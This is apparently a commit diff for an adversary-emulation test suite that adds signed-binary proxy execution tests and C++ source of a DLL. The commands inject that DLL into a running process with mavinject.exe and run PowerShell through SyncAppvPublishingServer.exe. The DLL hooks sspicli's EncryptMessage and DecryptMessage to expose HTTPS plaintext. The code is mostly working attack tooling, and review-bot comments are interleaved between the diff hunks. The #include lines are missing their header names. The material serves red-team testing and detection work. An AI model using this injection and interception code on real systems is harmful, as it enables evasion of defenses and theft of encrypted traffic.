diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml
new file mode 100644
index 00000000..aba47707
--- /dev/null
+++ b/atomics/T1218/T1218.yaml
@@ -0,0 +1,42 @@
+---
+attack_technique: T1218
+display_name: Signed Binary Proxy Execution
+
+atomic_tests:
+- name: mavinject - Inject DLL into running process
+ description: |
+ Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ dll_payload:
+ description: DLL to inject
+ type: Path
+ default: C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll
+ process_id:
+ description: PID of process receiving injection
+ type: string
+ default: 1000
+ executor:
+ name: command_prompt
+ command: |
+ mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
+
+- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
+ description: |
+ Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ powershell_code:
+ description: PowerShell code to execute
+ type: string
+ default: Start-Process calc.exe
+ executor:
+ name: command_prompt
+ command: |
+ SyncAppvPublishingServer.exe "n; #{powershell_code}"
diff --git a/atomics/T1218/src/T1218.cpp b/atomics/T1218/src/T1218.cpp
new file mode 100644
index 00000000..701fe2a4
--- /dev/null
+++ b/atomics/T1218/src/T1218.cpp
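Review bot: `process_id` is declared `type: string` but carries a bare integer default `1000`, and neither the description nor the default tells the tester that the PID must be a throwaway process they control; the companion DLL in this commit patches `sspicli.dll` inside the target and its `DllMain` has no detach cleanup, so a stale or arbitrary PID will destabilize an unrelated process. Suggest `description: PID of a disposable process started for this test; the injected DLL hooks EncryptMessage/DecryptMessage in it and is not unloaded afterwards` and either a quoted string default or a type that matches the numeric value. The `default` for `dll_payload` is the absolute path `C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll`, which only holds when the repository is checked out at that location, so the test description should state that assumption.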
@@ -0,0 +1,147 @@
+#define SECURITY_WIN32 //Define First Before Imports.
+
+#include
+#include
+#include //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies
+
+FARPROC fpEncryptMessage; //Pointer To The Original Location
+BYTE bSavedByte; //Saved Byte Overwritten by 0xCC -
+
+FARPROC fpDecryptMessage; //Pointer To The Original Location
+BYTE bSavedByte2; //Saved Byte Overwritten by 0xCC -
+
+
+// Original Idea/Reference Blog Post Here:
+// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
+// PoC by Casey Smith @subTee
+// From PowerShell
+// mavinject.exe $pid /INJECTRUNNING C:\AtomicTests\AtomicSSLHookx64.dll
+// curl https://www.example.com
+// Should Hook and Display Request/Response from HTTPS
+
+
+
+
+BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
+ DWORD dwOldProt = 0;
+ if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE) {
+ return FALSE;
+ }
+ MoveMemory(fpFunc, b, size);
+
+ return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt);
+}
+
+//TODO, Combine HOOK Function To take 2 params. DLL and Function Name.
+VOID HookFunction(VOID) {
+ fpEncryptMessage = GetProcAddress(LoadLibrary(L"sspicli.dll"), "EncryptMessage");
+ if (fpEncryptMessage == NULL) {
+ return;
+ }
+
+ bSavedByte = *(LPBYTE)fpEncryptMessage;
+
+ const BYTE bInt3 = 0xCC;
+ if (WriteMemory(fpEncryptMessage, &bInt3, sizeof(BYTE)) == FALSE) {
+ ExitThread(0);
+ }
+}
+
+VOID HookFunction2(VOID) {
+ fpDecryptMessage = GetProcAddress(LoadLibrary(L"sspicli.dll"), "DecryptMessage");
+ if (fpDecryptMessage == NULL) {
+ return;
+ }
+
+ bSavedByte2 = *(LPBYTE)fpDecryptMessage;
+
+ const BYTE bInt3 = 0xCC;
+ if (WriteMemory(fpDecryptMessage, &bInt3, sizeof(BYTE)) == FALSE) {
+ ExitThread(0);
+ }
+}
+
+SECURITY_STATUS MyEncryptMessage(
+ PCtxtHandle phContext,
+ ULONG fQOP,
+ PSecBufferDesc pMessage,
+ ULONG MessageSeqNo
+)
+{
+
+ char* buffer = (char*)((DWORD_PTR)(pMessage->pBuffers->pvBuffer) + 0x29); //Just Hardcode for PoC
+
+ ::MessageBoxA(NULL, buffer, "MITM Intercept", 0);
+
+ if (WriteMemory(fpEncryptMessage, &bSavedByte, sizeof(BYTE)) == FALSE) {
+ ExitThread(0);
+ }
+
+ SECURITY_STATUS SEC_EntryRet = EncryptMessage(phContext, fQOP, pMessage, MessageSeqNo);
+ HookFunction();
+ return SEC_EntryRet;
+}
+
+SECURITY_STATUS MyDecryptMessage(
+ PCtxtHandle phContext,
+ PSecBufferDesc pMessage,
+ ULONG MessageSeqNo,
+ ULONG fQOP
+)
+{
+
+ if (WriteMemory(fpDecryptMessage, &bSavedByte2, sizeof(BYTE)) == FALSE) {
+ ExitThread(0);
+ }
+
+ SECURITY_STATUS SEC_EntryRet = DecryptMessage(phContext, pMessage, MessageSeqNo, &fQOP );
+
+ char* buffer = (char*)(pMessage->pBuffers->pvBuffer);
+
+ ::MessageBoxA(NULL, buffer, "MITM Intercept", 0);
+
+ HookFunction2();
+ return SEC_EntryRet;
+}
+
+
+LONG WINAPI
+MyVectoredExceptionHandler1(
+ struct _EXCEPTION_POINTERS *ExceptionInfo
+)
+{
+ UNREFERENCED_PARAMETER(ExceptionInfo);
+#ifdef _WIN64
+ if (ExceptionInfo->ContextRecord->Rip == (DWORD_PTR)fpEncryptMessage) {
+ ExceptionInfo->ContextRecord->Rip = (DWORD_PTR)MyEncryptMessage;
+ }
+
+ if (ExceptionInfo->ContextRecord->Rip == (DWORD_PTR)fpDecryptMessage) {
+ ExceptionInfo->ContextRecord->Rip = (DWORD_PTR)MyDecryptMessage;
+ }
+
+#else
+ if (ExceptionInfo->ContextRecord->Eip == (DWORD_PTR)fpEncryptMessage) {
+ ExceptionInfo->ContextRecord->Eip = (DWORD_PTR)MyEncryptMessage;
+ }
+
+ if (ExceptionInfo->ContextRecord->Eip == (DWORD_PTR)fpDecryptMessage) {
+ ExceptionInfo->ContextRecord->Eip = (DWORD_PTR)MyDecryptMessage;
+ }
+
+#endif
+ return EXCEPTION_CONTINUE_SEARCH;
+}
+
+BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
+ switch (fdwReason) {
+ case DLL_PROCESS_ATTACH:
+ AddVectoredExceptionHandler(1, (PVECTORED_EXCEPTION_HANDLER)MyVectoredExceptionHandler1);
+ HookFunction();
+ HookFunction2();
+ ::MessageBoxA(NULL, "Locked and Loaded!", "Boom!", 0);
+ break;
+ }
+
+ return TRUE;
+}
diff --git a/atomics/T1218/src/Win32/T1218.dll b/atomics/T1218/src/Win32/T1218.dll
new file mode 100644
index 00000000..660242c1
Binary files /dev/null and b/atomics/T1218/src/Win32/T1218.dll differ
diff --git a/atomics/T1218/src/x64/T1218.dll b/atomics/T1218/src/x64/T1218.dll
new file mode 100644
index 00000000..91bffa6a
Binary files /dev/null and b/atomics/T1218/src/x64/T1218.dll differ
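Review bot: `MyVectoredExceptionHandler1` marks its parameter with `UNREFERENCED_PARAMETER(ExceptionInfo);` and then dereferences `ExceptionInfo->ContextRecord` on the very next line in both the `_WIN64` and 32-bit branches, so the macro is wrong and should simply be removed. `DllMain` handles only `DLL_PROCESS_ATTACH`: the handle returned by `AddVectoredExceptionHandler` is discarded and the `0xCC` bytes written by `HookFunction`/`HookFunction2` are never restored, so a host process that later unloads this DLL is left with a registered handler pointing at unmapped code; keep the handle and, in a `DLL_PROCESS_DETACH` case, call `RemoveVectoredExceptionHandler` and write `bSavedByte`/`bSavedByte2` back through `WriteMemory`. The three `#include` directives show no header name in this rendering, presumably stripped by the page renderer, so confirm the committed file actually names them since the listing as shown cannot compile. A header comment stating the side effects for whoever runs this atomic — the DLL patches `EncryptMessage`/`DecryptMessage` in the target's `sspicli.dll` and raises a `MessageBoxA` dialog on every call — would help testers pick a disposable target process and know what to expect to see.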